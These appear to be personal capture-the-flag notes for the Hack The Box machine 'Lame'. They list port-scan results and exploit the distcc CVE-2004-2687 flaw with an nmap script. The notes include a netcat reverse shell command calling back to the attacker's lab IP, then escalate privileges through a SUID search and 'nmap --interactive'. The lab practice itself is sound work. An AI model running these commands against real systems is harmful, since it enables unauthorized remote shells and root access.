source: https://www.hackthebox.eu/home/machines/profile/1
my ip: 10.10.14.2
10.10.10.3
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Samba 3.0.20-Debian
https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html
nmap -n -v -p3632 10.10.10.3 --script distcc-cve2004-2687
uid=1(daemon) gid=1(daemon) groups=1(daemon)
reverse shell:
nmap -n -v -p3632 10.10.10.3 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc 10.10.14.2 443 -e /bin/bash'"
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 8.04"
makis:x:1003:1003::/home/makis:/bin/sh
find / -perm -u=s 2>/dev/null
nmap --interactive
!sh